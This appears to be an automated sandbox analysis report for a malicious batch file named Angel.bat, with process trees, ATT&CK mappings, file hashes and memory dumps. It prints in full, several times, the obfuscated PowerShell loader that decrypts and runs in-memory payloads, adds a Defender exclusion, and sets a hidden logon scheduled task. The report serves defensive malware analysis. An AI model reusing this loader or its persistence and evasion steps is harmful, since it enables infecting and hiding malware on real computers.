  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMWPnP2r2MLCaMizFku5UrNLQs/2yb0AuhhFFlV0F6Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jgK+aFLUfjzYKUCFOFDVXQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hSgMg=New-Object System.IO.MemoryStream(,$param_var); $NqjUU=New-Object System.IO.MemoryStream; $KOzxN=New-Object System.IO.Compression.GZipStream($hSgMg, [IO.Compression.CompressionMode]::Decompress); $KOzxN.CopyTo($NqjUU); $KOzxN.Dispose(); $hSgMg.Dispose(); $NqjUU.Dispose(); $NqjUU.ToArray();}function execute_function($param_var,$param2_var){ $YPIAk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rjcHJ=$YPIAk.EntryPoint; $rjcHJ.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$PQmmk = 'C:\Users\Admin\Downloads\Angel.bat';$host.UI.RawUI.WindowTitle = $PQmmk;$mpuEW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PQmmk).Split([Environment]::NewLine);foreach ($USRZd in $mpuEW) { if ($USRZd.StartsWith(':: ')) { $LOVQd=$USRZd.Substring(3); break; }}$payloads_var=[string[]]$LOVQd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $PQmmk;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_45_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_45.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4168
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_45.vbs"
    3⤵
    - Checks computer location settings
    PID:4688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_45.bat" "
      4⤵
      PID:3704
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        
        PID:1596
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:3096
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMWPnP2r2MLCaMizFku5UrNLQs/2yb0AuhhFFlV0F6Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jgK+aFLUfjzYKUCFOFDVXQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hSgMg=New-Object System.IO.MemoryStream(,$param_var); $NqjUU=New-Object System.IO.MemoryStream; $KOzxN=New-Object System.IO.Compression.GZipStream($hSgMg, [IO.Compression.CompressionMode]::Decompress); $KOzxN.CopyTo($NqjUU); $KOzxN.Dispose(); $hSgMg.Dispose(); $NqjUU.Dispose(); $NqjUU.ToArray();}function execute_function($param_var,$param2_var){ $YPIAk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rjcHJ=$YPIAk.EntryPoint; $rjcHJ.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$PQmmk = 'C:\Users\Admin\AppData\Roaming\startup_str_45.bat';$host.UI.RawUI.WindowTitle = $PQmmk;$mpuEW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PQmmk).Split([Environment]::NewLine);foreach ($USRZd in $mpuEW) { if ($USRZd.StartsWith(':: ')) { $LOVQd=$USRZd.Substring(3); break; }}$payloads_var=[string[]]$LOVQd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $PQmmk;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Angel.bat" "
1⤵
PID:3792
- C:\Windows\system32\net.exe
  net file
  2⤵
  PID:4728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:1972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMWPnP2r2MLCaMizFku5UrNLQs/2yb0AuhhFFlV0F6Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jgK+aFLUfjzYKUCFOFDVXQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hSgMg=New-Object System.IO.MemoryStream(,$param_var); $NqjUU=New-Object System.IO.MemoryStream; $KOzxN=New-Object System.IO.Compression.GZipStream($hSgMg, [IO.Compression.CompressionMode]::Decompress); $KOzxN.CopyTo($NqjUU); $KOzxN.Dispose(); $hSgMg.Dispose(); $NqjUU.Dispose(); $NqjUU.ToArray();}function execute_function($param_var,$param2_var){ $YPIAk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rjcHJ=$YPIAk.EntryPoint; $rjcHJ.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$PQmmk = 'C:\Users\Admin\Downloads\Angel.bat';$host.UI.RawUI.WindowTitle = $PQmmk;$mpuEW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PQmmk).Split([Environment]::NewLine);foreach ($USRZd in $mpuEW) { if ($USRZd.StartsWith(':: ')) { $LOVQd=$USRZd.Substring(3); break; }}$payloads_var=[string[]]$LOVQd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $PQmmk;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:2348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_788_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_788.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4836
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_788.vbs"
    3⤵
    - Checks computer location settings
    PID:464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_788.bat" "
      4⤵
      PID:2388
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        
        PID:4168
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:5012
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMWPnP2r2MLCaMizFku5UrNLQs/2yb0AuhhFFlV0F6Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jgK+aFLUfjzYKUCFOFDVXQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hSgMg=New-Object System.IO.MemoryStream(,$param_var); $NqjUU=New-Object System.IO.MemoryStream; $KOzxN=New-Object System.IO.Compression.GZipStream($hSgMg, [IO.Compression.CompressionMode]::Decompress); $KOzxN.CopyTo($NqjUU); $KOzxN.Dispose(); $hSgMg.Dispose(); $NqjUU.Dispose(); $NqjUU.ToArray();}function execute_function($param_var,$param2_var){ $YPIAk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rjcHJ=$YPIAk.EntryPoint; $rjcHJ.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$PQmmk = 'C:\Users\Admin\AppData\Roaming\startup_str_788.bat';$host.UI.RawUI.WindowTitle = $PQmmk;$mpuEW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PQmmk).Split([Environment]::NewLine);foreach ($USRZd in $mpuEW) { if ($USRZd.StartsWith(':: ')) { $LOVQd=$USRZd.Substring(3); break; }}$payloads_var=[string[]]$LOVQd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $PQmmk;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
196ae191e89add3288b5744b42b464da

SHA1
42ae4c845cdfc5c1d00e4b01281de248e862ef6d

SHA256
8b873bcbfbc86e36f57f02c30034d145131cc520411213732a1861c63c5bb81c

SHA512
c35600ac016a9c785f565004bbe284144e8d6cb358621b05be335ba81d325a63b072b9336bc71d89583b516420cdcbf54079afeed085d8a721c1c6d81a28217c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
30KB

MD5
22cdbd50aa75c4b6d4ff7e162feb0a7b

SHA1
95f3fa9060d5d5efd61652415ef881b884a7fd8d

SHA256
61515550835688df18e3ba3a73bd865d52f2e88a824583455769bbdb629d544d

SHA512
1520ae9f474fe585c38c0808d98881ff6befb166eab8861f3729ac08dbb424144187ce941dc5f7697dad0b1704e9ee7f4b1b7058ec5d48eb86c5848dff54e295

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
54KB

MD5
f63d63946b1d06719236a31e337a7029

SHA1
2100cede6c78d3c0e7bf0c331eebf2c927bf0973

SHA256
13b52a6c64586b369fc0ce37f17daf6a184b754712284d819e9e073586018b8a

SHA512
62316c35ef22fe1909a7a53c39d23d67a33c939b69fdf8e5e8cfc5d3d1ec1de0c234f7a384e2683312280c6c34d2bb303543bb122d5fc779fae7cb739aced493

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
51KB

MD5
43c5f1f34b6938292761374b03dfacb8

SHA1
bdd84ec900aa1818ecc27f2b46a66d1b8e4c75ee

SHA256
e69118eed8f42cb88f2b50544b7054b2835b8fc5d58dd4b96617170fbef8d885

SHA512
80f4804ea067e9f12ede8270ba6fdc3465c500ebc33f122d174bb57430d34d838a41f93aad61d16521721eaba9acfbf041464c8a63fdf9a162588ae77270aa2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
51KB

MD5
1c5eb1ed77eb260feede13b138055680

SHA1
b6c53281133c9579367fbfc842599a82bd5883ef

SHA256
ff3b11ba2517b6bb69e570de5a25cba015e1948e2c00f5a0978e71b3e95fd9cc

SHA512
3909567faf58c25a95951398685e11f6501cb857d5d8bf13a73f31484ffaa62d2325a9b444af577c2b512aae605edc75cfef8602031b18d1e8c0a360e0fd989a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a9b095fd1660e6fe37d527c9978b2507

SHA1
b73ab7e8d07bc65df92143ed52a397e41c455707

SHA256
06ca30b319c311522ec05ed0e84728cd47015ae48eb8ba86fe24723acca519b0

SHA512
301cab51adb7d30f0a593e783ac4447a6626affbe956bc30a60c66573e409be0bc68e2609900677ef99da6d5453a294948049d0e3db23ab24676676a23a7dd1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dbbf71e9fb59f80938f09809b160e441

SHA1
8b9a517d846cb9a0a284f77ed88328236a85055f

SHA256
e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

SHA512
90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDA00.tmp

Filesize
1KB

MD5
ae341f8d0fb9ea5f96bc7595fb7dffef

SHA1
bf08e05a4c2354ba9f133ea02fe3d7800c1f42c3

SHA256
42f5447647df8a3e8cece9cf338cbb61095ff0401854c64b4dd286d11b4ba7e0

SHA512
081cd0f8cd3e80a9fb76f4929def2972340f9fc434280c1acaecbdae5c33484c9edff5d944e6a1cc43af6fbb6840752e5a80f9cc97add5f26f151981a4addaa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDB77.tmp

Filesize
1KB

MD5
5b8384acf57266328fb99148b28a005a

SHA1
9f603820c4893e65c4ee8a662a703432c5f90d48

SHA256
d75739c332753571891964c2891eed0dc5f11e683aa5f49402b38bf4d93432f0

SHA512
e5b553832a7260bf7a83cd28f236964a02bb515206298463d162ab805076bc92e38556ddbfcc6428f54287d138cf77516b21918f61abcd548782f0a743035e4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_54gico2y.5ep.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_45.vbs

Filesize
114B

MD5
7046a6cf9b859a725c0bee2af9d23ae6

SHA1
3871f1a4691fc969a82345dbb4f16ede22bc3639

SHA256
c9416433f701458f87fb4cf0d1bb08edfc947ccaf0824f85eebb7ab55fa53cbb

SHA512
eb049c5acf2d2be6909a931dac9da608fc8d1ae64ceb7942b65ad0451c8fe15debb6c8ca7d6ace109909bf74c733d1e877629da5e6cfd77ef4ef43cd6bb1fbac

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_788.vbs

Filesize
115B

MD5
7bbd22fd813f1ef492fe37d9391900fe

SHA1
297bb1a09182db3a59b7f16a4bfe143c4bd99b1a

SHA256
75df9bc77f31a64d3f361cbd93ee58323df23a38c4d347ba3cc9775c452f79ba

SHA512
6263622ed38d04b73e095f5ae7d73848ffb810ce46f38d3ffdf1170bd4fcc89d8ab6888dad66a6c01f3434d5f1ad913929df5b7292948322c10055d14d05d6ff

Download Submit
C:\Users\Admin\Downloads\Angel.bat

Filesize
4.1MB

MD5
a034ec507ef81e2038fc40402a1c8cfa

SHA1
f67bee15a14fb31adf88f02dde45fb6623a2ad63

SHA256
037acb92ae3d2c1a80724863cf7db6a302bfd030b46c84c5ad40f65e45d5e1b2

SHA512
a320d6cc232198aff80bd0ae6f3ace3eea9370387ae2ef7f55227abe839448a82f7b5cab391fbcd12e62bd39424fbe468b71cc19c34d07564f47241ca0363c95

Download Submit
C:\Users\Admin\Downloads\VEAZrzShuu.tmp

Filesize
2.2MB

MD5
20c28727bbc05603682df668b8e60f06

SHA1
ed06f582a88c2e5fe5d4f5f112e8e795b9a48d97

SHA256
9c349c7a680c84b6615feb527a8396865ba97b6b10d56d8a55284cc1d3a7a7b5

SHA512
ff88c8b338b733cf64aa54ebe18ac53159c53140d5b3eabab7ae135cf8083de4c86f0d6ad425e08a7ab6af682a0ac6334de42083dce40a92075e45d1bf5b6638

Download Submit
C:\Users\Admin\Downloads\mMRpKyjmmJ.tmp

Filesize
5KB

MD5
28e34a565d01d2ed17ed4a1485b0f5a1

SHA1
66287b9e26ea6b4db5d8ed80ca9dc5a3fffada9e

SHA256
047c92b23f05a7acbcad2e86a50ed7fa3601dfdeee835157154d5e39a61df808

SHA512
a1bc7cf824d2f220030a640cec7d3cfe8600355e12460ebe9463fe3d1145ad924459b914a56b6859a16ba61dbc566a17859e0504483c3943e7c3a006cc220d91

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qul1smtk\qul1smtk.0.cs

Filesize
2KB

MD5
a8ff4ea875e3025336d34aa95d5ef9f0

SHA1
0ec17cbf30076aa3b13bb687931c430c1fb9b533

SHA256
d6c2a82c9c76af5608a898d8840dbb72644239319dcfe86aa6ec8b5120612541

SHA512
fded699dd73275a0cefcd347199b7f13e9eed671b19a714e2c9179677dfa17225ecdfaad423d27d3ab6e73499919576db11abaaa7a9c75ca5287583234946001

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qul1smtk\qul1smtk.cmdline

Filesize
253B

MD5
a106a041233ed31d87d961f9c95f9342

SHA1
39cb32e5358b026e9aa5f0af1f135c65f3bff633

SHA256
863e3182045db827d0a0cf41b09136accf57d50ccc09a0c32b948d56f40b7710

SHA512
a9f83d812a525c0c2e9e8f515499383cd564b0068eb9a73b9207924ef06445b84be371cf40acaa54a7d764b9634e20bea82770e2591ce0d95a931d788a95509e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xdhzhiqv\xdhzhiqv.0.cs

Filesize
10KB

MD5
199e497aefc230d71ff13a80bb36ff76

SHA1
033e5594e597eb6adf3e453e5e869f0dc02ee001

SHA256
39e34718c5dc0310ec52241d685b251b26dd3487e3c791572b45631ea1ad7516

SHA512
2b864a4957486f8ae9cefa03ab1831827f944c1e9d90ad4e368359c3c795c215b74d4d3ed8fdc54c7ec4e9171e6b9c51f0f08dac6f2ba93a4d6dfca9ebde218a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xdhzhiqv\xdhzhiqv.cmdline

Filesize
282B

MD5
b3462693c7d36a277c39e7cf40f64094

SHA1
606bd7c405d9c4c7a221bd447d210ab3a96c5219

SHA256
968aabce24221029d27bdfd9369b6ffeadff61f1d14ef47c54854d3a629958b0

SHA512
c8da2812e8d9011acbfed8b6cc7e8ecb95b5a730374dbe7c4ed21533530e9860aac5c4f0d36d70531ac3d21da7682520cf61e6d008f76439514dd0fdcea3a880

Download Submit
\??\c:\Users\Admin\Downloads\CSC2298B74C5E83454CAEC6D8AF9074F026.TMP

Filesize
1KB

MD5
1ffec4f836ad984ad02e410536dcada0

SHA1
50abe945ec7bf77855d049441aa19d1c8215e748

SHA256
ec559af6ca8ce76760d56c9aef5bf4e86e6975ba193f96fb1b5fce565de8efeb

SHA512
e3546b4044a9cd9d5b228b3e5f1618ec518a11a71b96568a5920e5980e0ae1f1a488eeb7f2f1eb3c5e6ddf4226ff83ce57924b6264a1bcd3a38a034587bd5424

Download Submit
\??\c:\Users\Admin\Downloads\CSCC465F4A4F1DF4FF69A3D73479A2E4D63.TMP

Filesize
1KB

MD5
30de4f1243d47f7d5be48cbdf04848a5

SHA1
eecee249c55336c7158338ff96bbf12e13417cd7

SHA256
b3fbb06b5a29759f54773e57b923f0a65bceb1a3663cbfb05c703a8c8b0a8ecc

SHA512
4f5d1ed2e2dee464f6523e97dbd4b0b68d8ccc3fd1928562bf572b501502429b8a40c870cfa9d7b4077cc2126a2be202e4a58be4fcccddd20ca07f792c9d3e32

Download Submit
\??\c:\Users\Admin\Downloads\UAC

Filesize
151KB

MD5
10a22e33d863190ee444fd881c002a76

SHA1
a9289916b51a7d9d09ac427776111bb660531fee

SHA256
97d279782e32c2c49aed0df559aa5dd93fcd6f65906d3199f72de918b77b989a

SHA512
fad01792e2a9cd290a371863089cda3ca08ef8a1d3f77533b147ad7fe1616e87cd6a59ff8250128c28282944cce44c7126a25c82a7fbb06e588548ff0d73c092

Download Submit
\??\c:\Users\Admin\Downloads\payload.exe

Filesize
2.1MB

MD5
30ad2b5e88ff04b3f069601c7a3bcff5

SHA1
5c912697934e5c2a0e001ddb0b8b971711a5dc72

SHA256
e1e988b55f869c2e1221f80a773cee9dab50d0400fc6442e03d8be1a26180b98

SHA512
23a57ca1431c9d24f815fad364107ef8e725666669a1ad06f51d8eb51c76367f2b6100c850a2074b3c97011a0ff6ab89b56651148cd35ccbdbffb93983813156

Download Submit
memory/4280-180-0x000001D72AA10000-0x000001D72ACA2000-memory.dmp

Filesize
2.6MB

Download
memory/4476-3-0x00000000058D0000-0x0000000005962000-memory.dmp

Filesize
584KB

Download
memory/4476-11-0x0000000075250000-0x0000000075A00000-memory.dmp

Filesize
7.7MB

Download
memory/4476-10-0x000000007525E000-0x000000007525F000-memory.dmp

Filesize
4KB

Download
memory/4476-9-0x0000000075250000-0x0000000075A00000-memory.dmp

Filesize
7.7MB

Download
memory/4476-8-0x0000000009720000-0x00000000097D0000-memory.dmp

Filesize
704KB

Download
memory/4476-45-0x0000000003220000-0x0000000003242000-memory.dmp

Filesize
136KB

Download
memory/4476-1-0x0000000000BC0000-0x0000000000E52000-memory.dmp

Filesize
2.6MB

Download
memory/4476-7-0x0000000075250000-0x0000000075A00000-memory.dmp

Filesize
7.7MB

Download
memory/4476-13-0x0000000075250000-0x0000000075A00000-memory.dmp

Filesize
7.7MB

Download
memory/4476-46-0x0000000011210000-0x0000000011564000-memory.dmp

Filesize
3.3MB

Download
memory/4476-0-0x000000007525E000-0x000000007525F000-memory.dmp

Filesize
4KB

Download
memory/4476-6-0x0000000005C60000-0x0000000005E74000-memory.dmp

Filesize
2.1MB

Download
memory/4476-5-0x0000000005860000-0x000000000586A000-memory.dmp

Filesize
40KB

Download
memory/4476-4-0x0000000075250000-0x0000000075A00000-memory.dmp

Filesize
7.7MB

Download
memory/4476-49-0x0000000075250000-0x0000000075A00000-memory.dmp

Filesize
7.7MB

Download
memory/4476-2-0x0000000005FA0000-0x0000000006544000-memory.dmp

Filesize
5.6MB

Download
memory/4476-12-0x0000000075250000-0x0000000075A00000-memory.dmp

Filesize
7.7MB

Download
memory/5012-124-0x000001E5EC180000-0x000001E5EC3C2000-memory.dmp

Filesize
2.3MB

Download
memory/5012-112-0x000001E5E3E60000-0x000001E5E3E82000-memory.dmp

Filesize
136KB

Download
memory/5012-122-0x000001E5CB5E0000-0x000001E5CB5E8000-memory.dmp

Filesize
32KB

Download